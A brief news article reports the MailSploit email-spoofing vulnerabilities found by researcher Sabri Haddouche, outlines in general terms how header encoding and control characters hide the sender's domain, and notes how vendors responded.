Discovered by a security researcher called Sabri Haddouche, the set of vulnerabilities, called ‘MailSploit‘ – which affects Apple Mail, Mozilla Thunderbird and several official Microsoft email clients together with Yahoo Mail, ProtonMail, and others got leaked. A list which tells you if your clients is affected by this hole is available for everyone here.
How does the attack work?
Haddouche created a payload by encoding non-ASCII characters inside the email headers, successfully sending a spoofed email from an official address belonging to President of the United States.
“Using a combination of control characters such as new lines or null-byte, it can result in hiding or removing the domain part of the original email.”
– Haddouche says in his blog post.
Mozilla and Opera consider this bug to be a server-side problem and will not be releasing any patch. Mailbird closed the ticket without responding to the issue, while remaining 14 vendors did not yet comment on the researcher’s report but I guess they will also not respond to it.
- MailSploit (MailSploit)